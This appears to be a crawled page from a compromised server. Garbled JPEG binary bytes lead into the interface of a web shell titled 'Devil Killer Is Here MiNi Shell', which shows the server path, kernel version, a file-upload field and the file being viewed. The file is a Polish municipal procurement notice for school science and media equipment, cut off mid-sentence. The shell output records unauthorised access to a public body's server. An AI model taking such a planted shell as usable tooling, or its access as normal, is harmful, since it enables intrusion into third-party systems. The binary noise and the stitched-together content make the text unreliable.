JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230707/0029644701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu i pomocy dydaktycznych w ramach projektu pn. „Laboratoria Przyszłości” dla Gminy Grodzisk Mazowiecki III </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GRODZISK MAZOWIECKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269137</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. T. Kościuszki 12A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grodzisk Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-825</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(22) 755 55 34 wew. 250</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(22) 755 23 76</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@grodzisk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.grodzisk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu i pomocy dydaktycznych w ramach projektu pn. „Laboratoria Przyszłości” dla Gminy Grodzisk Mazowiecki III </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5d6125da-1cb5-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00296447</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/790932 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/790932</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>dot. korespondencji elektronicznej zawiera Rozdz. XIII SWZ i Rozdz. XIV SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, zamawiający informuje, że: <br/>1)	administratorem danych osobowych osób fizycznych jest Burmistrz Grodziska Mazowieckiego,<br/>2)	Zamawiający wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować pocztą elektroniczną na adres: email: abi@grodzisk.pl, tel.: 22 755 55 34, <br/>3)	dane osobowe osób fizycznych przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządzenia 2016/679 w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego - Oznaczenie sprawy: ZP.271.50.2023<br/>4)	w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 rozporządzenia 2016/679;<br/>5)	osoba fizyczna posiada:<br/>a)	na podstawie art. 15 rozporządzenia 2016/679 prawo dostępu do danych osobowych jej dotyczących;<br/>b)	na podstawie art. 16 rozporządzenia 2016/679 prawo do sprostowania swoich danych osobowych;<br/>c)	na podstawie art. 18 rozporządzenia 2016/679 prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679; <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba fizyczna uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy rozporządzenia 2016/679;<br/>6)	osobie fizycznej nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia 2016/679 prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia 2016/679;<br/>c)	na podstawie art. 21 rozporządzenia 2016/679 prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych osób fizycznych jest art. 6 ust. 1 lit. c rozporządzenia 2016/679. <br/>2.	Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.50.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Oferta częściowa nr 1- Szkoła Podstawowa nr 1 w Grodzisku Mazowieckim<br/><br/>1. Fizyka w Walizce 8<br/> Ilość: 1 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Zestaw: Magnetyzm i elektromagnetyzm<br/><br/>Zestaw Magnetyzm z serii Fizyka w Walizce umożliwia przeprowadzenie doświadczeń z zakresu magnetyzmu i elektromagnetyzmu zgodnie z dołączonymi kartami pracy zawartymi w dołączonej instrukcji. Dzięki temu zestawowi uczniowie mogą badać typowe eksperymenty, takie jak badanie różnic między substancjami diamagnetycznymi, paramagnetycznymi i ferromagnetycznymi, liniami pola magnetycznego i prądem indukowanym z pola magnetycznego. Wszystkie elementy w zestawie są umieszczone w aluminiowej walizce wyściełanej gąbką<br/><br/>SKŁAD ZESTAWU:<br/>3 x Oprawka do baterii typu D; <br/>1 x Przezroczysta płytka akrylowa podtrzymująca magnesy trwałe i wspornik pod płytkę akrylową;<br/>4 x Przewód z wtykami bananowymi 25 cm;<br/>1 x Przełącznik przyciskowy;<br/>1 x Paramagnetyczny pierścień aluminiowy (średnica 25 mm);<br/>1 x Multimetr;<br/>1 x Sonda magnetyczna;<br/>1 x Lejek z tworzywa sztucznego;<br/>10 x Kompasy kartograficzne;<br/>2 x Przewód z wtykami bananowymi 50 cm;<br/>2 x Magnesy sztabkowe;<br/>1 x Opiłki żelazne (300g);<br/>2 x Płytka stalowa;<br/>1 x Pojedynczy zwój cewki i pięć zwojów cewki zatopione w płytce akrylowej;<br/>1 x Przewodnik prostoliniowy zatopiony w płytce akrylowej;<br/>1 x Długi przewodnik w kształcie cewki zatopionej w płytce akrylowej;<br/>1 x Instrukcja z kartami pracy w formie elektronicznej<br/><br/>2.	Fizyka w Walizce 5<br/> Ilość: 1 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Zestaw: Elektryczność cz.1<br/><br/>Zestaw Elektryczność cz. 1 z serii Fizyka w Walizce umożliwiający przeprowadzenie kilkunastu doświadczeń z zakresu elektryczności.<br/><br/>SKŁAD ZESTAWU:<br/>1 x Płyta montażowa układów elektrycznych i elektrycznych;<br/>1 x Woltomierz analogowy, 0-15V, 0-1,5V;<br/>1 x Miliamperomierz 0-500mA, 0-50mA;<br/>1 x Magnes walcowy;<br/>4 x Rezystor 100 Ω;<br/>2 x Rezystor 220 Ω;<br/>2 x Rezystor 470 Ω;<br/>2 x Rezystor 1 kΩ;<br/>2 x Rezystor 4,7 kΩ;<br/>2 x Rezystor 10 kΩ;<br/>1 x Potencjometr 100 Ω;<br/>2 x Kondensator 1000 uF;<br/>4 x Oprawka do żarówki E10;<br/>4 x Zwora;<br/>1 x Pojemnik do dwóch baterii;<br/>1 x Oprawka do pojedynczej baterii;<br/>1 x Cewka indukcyjna 10mH;<br/>1 x Kompas;<br/>1 x Przełącznik uchylny;<br/>1 x Przełącznik przyciskowy;<br/>4 x Żarówka E10 3,5V;<br/>4 x Żarówka E10 6V;<br/>4 x Żarówka E10 12V;<br/>1 x Rdzeń ferromagnetyczny (stalowa śruba heksagonalna i nakrętka);<br/>2 x Przewód z wtykami bananowymi 25 cm, czerwony;<br/>2 x Przewód z wtykami bananowymi 25 cm, czarny;<br/>1 x Przewód z wtykami bananowymi 50 cm, czerwony;<br/>1 x Przewód z wtykami bananowymi 50 cm, czarny;<br/>2 x Multimetr;<br/>1 x Instrukcja z kartami pracy<br/><br/>3.	Fizyka w Walizce 6<br/> Ilość: 1 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/><br/>Zestaw: Elektryczność cz.2 rozszerzenie<br/><br/>Zestaw Elektryczność cz. 2 rozszerzenie z serii Fizyka w Walizce umożliwiający przeprowadzenie 9 doświadczeń z zakresu elektryczności<br/><br/><br/>SKŁAD ZESTAWU:<br/>1 x Rdzeń żelazny i podstawa transformatora;<br/>1 x Cewka 600 zwojów;<br/>1 x Cewka 1200 zwojów;<br/>2 x Pojedynczy przełącznik dwupozycyjny (przełącznik SPDT)<br/>1 x Przekaźnik;<br/>1 x Brzęczyk piezoelektryczny;<br/>2 x Silnik elektryczny stałoprądowy;<br/>1 x Rurka gumowa;<br/>2 x Śmigło z tworzywa sztucznego;<br/>1 x Model silnika;<br/>1 x Woltomierz analogowy;<br/>1 x Potencjometr 100 Ω;<br/>2 x Oprawka do żarówki E10;<br/>2 x Zwora;<br/>1 x Pojemnik do dwóch baterii;<br/>1 x Oprawka do pojedynczej baterii;<br/>1 x Przełącznik uchylny;<br/>1 x Przełącznik przyciskowy;<br/>2 x Żarówka E10 3,5V;<br/>2 x Przewód z wtykami bananowymi 25 cm, czerwony;<br/>2 x Przewód z wtykami bananowymi 25 cm, czarny;<br/>1 x Przewód z wtykami bananowymi 50 cm, czerwony;<br/>1 x Przewód z wtykami bananowymi 50 cm, czarny;<br/>1 x Instrukcja z kartami pracy w formie elektronicznej<br/><br/><br/>4.	Chemia <br/>Ilość: 1 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Duży zestaw chemii organicznej i nieorganicznej <br/>Zestaw zawiera 212 elementów, umożliwiających budowę bardzo szerokiej gamy struktur.<br/><br/>W skład zestawu wchodzą:<br/>•	atomy wodoru H, 14 szt., średnica 15 mm,<br/>•	atomy węgla C, 20 szt., średnica 22 mm,<br/>•	atomy tlenu O, 22 szt., średnica 22 mm,<br/>•	atomy azotu, 10 szt., średnica 22 mm,<br/>•	atomy siarki, 13 szt., średnica 22 mm,<br/>•	atomy fosforu, 7 szt., średnica 22 mm,<br/>•	atomy halogenków, 8 szt., średnica 15 mm,<br/>•	atomy metali 14 szt., średnica 22 mm,<br/>•	orbitale 2D, 18 szt. - wiązania średnie, 38 szt.,<br/>•	wiązania średnie, 12 szt.,<br/>•	wiązania długie giętkie, 36 szt.<br/><br/>5. Filament<br/>Ilość: 3 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Filament - Biodegradowalne filamenty kompatybilne z drukarkami Zortrax M200 <br/>Zawartość zestawu - 3 szt. <br/>Rodzaj - PLA </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">39300000-5 - Różny sprzęt</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający kierował się będzie kryteriami wskazanymi<br/>w SWZ oraz sposobem oceny ofert w ramach tych kryteriów opisanym w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Oferta częściowa nr 2- Szkoła Podstawowa nr 2 w Grodzisku Mazowieckim<br/><br/>1.	Zestaw mikrofonów bezprzewodowych<br/>Ilość: 2<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>DNA STAGE VOCAL SET - podwójny zestaw do ręki<br/><br/>•	Metoda modulacji: Π/4-DQPSK<br/>•	Zakres częstotliwości: 518-542 MHz (2x100 lub 4x50 kanałów)<br/>•	Współczynnik próbkowania: 48 kHz<br/>•	Szybkość transmisji: 204,8 kb/s<br/>•	Zakres dynamiki: &gt;90 dB<br/>•	Całkowite zniekształcenie harmoniczne: &lt;0,1%<br/>•	Czas opóźnienia transmisji dźwięku: &lt;3 ms<br/>•	Współczynnik S/N: &gt;96 dB<br/>•	Pasmo przenoszenia: 30 ~ 20 kHz<br/>•	Czułość RX: &lt;-94 dBm<br/>•	Unikalny adres ID: tak<br/><br/>2. Pen 3D z akcesoriami<br/>Ilość: 3 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Podwójny system napędowy.<br/>Obsługujący: PLA, ABS i FLEXY<br/>Automatyczne cofanie filamentu, aby zapobiec wyciekaniu<br/>Funkcja auto sleep <br/>Średnica dyszy [mm] max. 2.2<br/>Temperatura pracy [st. C] max. 240<br/>Regulacja temperatury: Tak<br/>Regulacja szybkości wydruku: Tak<br/>Zasilanie: Sieciowo-akumulatorowe<br/><br/>Wyposażenie - Filament kompatybilne z PENem<br/><br/><br/>3. Wizualizer kompatybilny z mikroskopem<br/><br/>Ilość: 1 szt.<br/><br/>•	Wymagane minimalne parametry techniczne<br/><br/><br/>Zoom matrycowy (Aver Zoom/Pixel Zoom) - min. 204 x<br/>Sensor (przetwornik) -1/3.2 CMOS<br/>Ilość pikseli (efektywna) - Min. 8 Mpix<br/>Rozdzielczość (efektywna) - Min. Full HD 1080p (1920 x 1080) Mpix<br/>Częstotliwość odświeżania - Min. 60 FPS<br/>Zoom optyczny - Min. 10 x<br/>Zoom cyfrowy - Min. 16 x<br/>Obszar skanowania - Min. 437 x 246 mm<br/>Focus - Automatyczny/ręczny<br/>Wbudowana pamięć - Min. 80 zdjęć<br/> Zapis na karcie pamięci (typ) - karta SDHC port USB - np. pendrive<br/> Pilot zdalnego sterowania – TAK<br/> Oświetlenie zewnętrzne – 1x<br/> Typ oświetlenia – LED<br/> Wyjścia video - HDMI VGA (D-Sub15) Composite (RCA)<br/> Wejścia wideo - HDMI VGA (D-Sub15)<br/> Porty komunikacyjne - RS232 Mini USB USB<br/><br/><br/>4. Mikrofon nagłowny z akcesoriami<br/>Ilość: 2 szt.<br/><br/>•	Wymagane minimalne parametry techniczne<br/> Rodzaj przetwornika – Dynamiczny<br/> Rodzaj łączności – Przewodowa <br/> Charakterystyka kierunkowości - Kardioidalna<br/> Złącze- Jack 6,3 mm - 1 szt.<br/> Pasmo przenoszenia - Min. 50 ~ 15000 Hz<br/> Impedancja - 150 Om<br/> Czułość - Min. -67 dB<br/> Dodatkowe informacje - Długość kabla: 1,2 m Elastyczna gęsia szyja Składany wysięgnik mikrofonu<br/> Dołączone akcesoria - Gąbka mikrofonowa - Klips<br/> <br/>5. Dyktafon<br/>Ilość: 2 szt.<br/><br/>•	Wymagane minimalne parametry techniczne<br/><br/>Maksymalny poziom ciśnienia akustycznego - 120 dB SPL<br/>Wewnętrzne mikrofony - Min. 60 - 20000 Hz<br/> Format zapisu/odtwarzania - PCM (WAV) / MP3<br/> Złącza - Min. USB 2.0 Micro SD Min. mini-jack 3.5<br/>Wyświetlacz - Min. 1,4”<br/>Pamięć wewnętrzna - Min. 2GB<br/> Organizacja - Min. 5 folderów Min. 200 plików w folderze<br/> Zasilanie bateryjne - 1 x AAA<br/> Nagrywanie - Min. 38h na baterii<br/> Maks. moc wyjściowa - Min. 150 mW<br/><br/>6. Urządzenie do sterowania pracownią 3D<br/> Ilość: 1 szt.<br/><br/>•	Wymagane minimalne parametry techniczne<br/><br/>Wymagane parametry techniczne<br/>Zastosowanie - Urządzenie do sterowania drukarką 3D<br/>Matryca -Komputer przenośny typu notebook z ekranem 15,6” o rozdzielczości FHD (1920 x 1080), powłoką przeciwodblaskową, jasność 220 nits<br/>Wydajność - Procesor wielordzeniowy osiągający w teście Passmark CPU Mark wynik 6400 punktów według wyników ze strony http://www.cpubenchmark.net wynik z dnia 27.10.2021 r.<br/>Pamięć - RAM 16GB możliwość rozbudowy do min 32GB, jeden slot wolny<br/>Pamięć masowa - Min. 512GB SSD PCIe NVMe<br/>Karta graficzna - Zintegrowana w procesorze z możliwością dynamicznego przydzielenia pamięci systemowej<br/>Multimedia - Karta dźwiękowa zintegrowana z płytą główną, wbudowane dwa głośniki stereo o mocy 2x 2W.<br/>Mikrofon z funkcją redukcji szumów i poprawy mowy wbudowany w obudowę matrycy.<br/>Kamera internetowa z diodą informującą o aktywności, 0.9 Mpix, trwale zainstalowana w obudowie matrycy.<br/>Bateria i zasilanie - Bateria o pojemności min. 40Whr Zasilacz o mocy min. 45W<br/>Obudowa - Szkielet obudowy i zawiasy notebooka wykonany z wzmacnianego metalu. <br/>Obudowa spełniająca normy MIL-STD-810G (do oferty załączyć oświadczenie producenta) <br/>BIOS - BIOS producenta oferowanego komputera zgodny ze specyfikacją UEFI, wymagana pełna obsługa za pomocą klawiatury i wmontowanego na stałe urządzenia wskazującego oraz samego urządzenia wskazującego. Możliwość, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych, podłączonych do niego urządzeń zewnętrznych odczytania z BIOS informacji o: dacie produkcji komputera (data produkcji nieusuwalna), o kontrolerze audio, procesorze, a w szczególności min. i max. osiągana prędkość, pamięci RAM z informacją o taktowaniu i obsadzeniu w slotach. Niezmazywalne (nieedytowalne) pole asset tag. Funkcje logowania się do BIOS na podstawie hasła użytkownika, administratora (hasła niezależne), informację o stanie naładowania baterii (stanu użycia), podpiętego zasilacza, zarządzanie trybem ładowania baterii (np. określenie docelowego poziomu naładowania). Możliwość nadania numeru inwentarzowego z poziomu BIOS bez wykorzystania dodatkowego oprogramowania, jak i konieczności aktualizacji BIOS.<br/>Możliwość włączenia/wyłączenia funkcji automatycznego tworzenia recovery BIOS na dysku twardym<br/>Certyfikaty <br/>	Certyfikat ISO9001: 2015 dla producenta sprzętu <br/>	Certyfikat ISO 14001 dla producenta sprzętu <br/>	Deklaracja zgodności CE <br/>	Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych.<br/>Potwierdzenie kompatybilności komputera z zaoferowanym systemem operacyjnym<br/>Diagnostyka - System diagnostyczny zaszyty w tej samej pamięci flash co BIOS, dostępny z 